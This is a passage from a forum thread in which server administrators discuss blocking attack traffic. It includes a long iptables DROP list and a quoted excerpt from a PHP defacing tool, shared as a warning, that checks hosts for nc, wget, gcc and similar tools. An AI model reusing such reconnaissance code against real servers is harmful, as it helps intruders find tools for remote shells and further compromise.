$IPT -A INPUT -p ALL -s 209.133.117.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.135.140.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.147.114.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.189.226.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.190.16.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.215.164.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.249.12.0/24 -j DROP
$IPT -A INPUT -p ALL -s 210.55.199.0/24 -j DROP
$IPT -A INPUT -p ALL -s 210.66.146.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.117.143.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.118.97.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.131.127.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.139.227.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.155.84.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.201.202.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.232.77.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.32.67.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.36.108.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.55.160.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.55.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.58.36.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.64.86.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.69.166.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.69.173.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.71.84.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.73.103.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.227.212.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.127.58.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.148.180.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.15.6.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.153.59.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.159.152.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.107.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.129.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.135.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.143.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.165.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.171.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.176.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.20.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.213.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.216.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.218.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.226.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.230.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.243.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.253.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.94.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.172.173.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.172.178.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.172.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.174.252.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.19.43.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.198.196.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.221.217.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.6.204.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.6.2.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.65.209.0/24 -j DROP
$IPT -A INPUT -p ALL -s 222.124.24.0/24 -j DROP

Rgds...Geoff

You should not have to go through this.

I've got several publically exposed servers and manage to shut most of this down with firewall configuration.

I'm in the process of moving to a cluster that will also be behind a hardware based firewall.

I'd be interested to see your entire iptables configuration.

See my profile for a link, it would not be good to post here.

I have a firewall code generator script that might help. http://www.hpux.ws/firewall.tar.gz

You should be able to figure it out.

I've noted some flaws with iptables that seem to let traffic in on certain ports that are supposedly blocked after repeated pounding. Thats why I'm moving my operation behind a hardware firewall.

SEP

Steven - I keep getting

Gateway Timeout
The following error occurred:
[code=GATEWAY_TIMEOUT] A gateway timeout occurred. The server is unreachable. Retry the request.

from your form - go to chat?

http://www.cmve.net/voc/voc.php

Rgds...Geoff

BTW - latest "defacing" tool now searches for gcc and cc - sheesh....

Here's an exerpt:

//INFO table (pro and normal)
if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="xterm at /usr/X11R6/bin/xterm, ";
if (@file_exists("/usr/bin/nc")) $pro2="nc at /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget")) $pro3="wget at /usr/bin/wget, ";
if (@file_exists("/usr/bin/lynx")) $pro4="lynx at /usr/bin/lynx, ";
if (@file_exists("/usr/bin/gcc")) $pro5="gcc at /usr/bin/gcc, ";
if (@file_exists("/usr/bin/cc")) $pro6="cc at /usr/bin/cc ";


Safest bet is to move these to non standard directories that can only be found by root.

Rgds...Geoff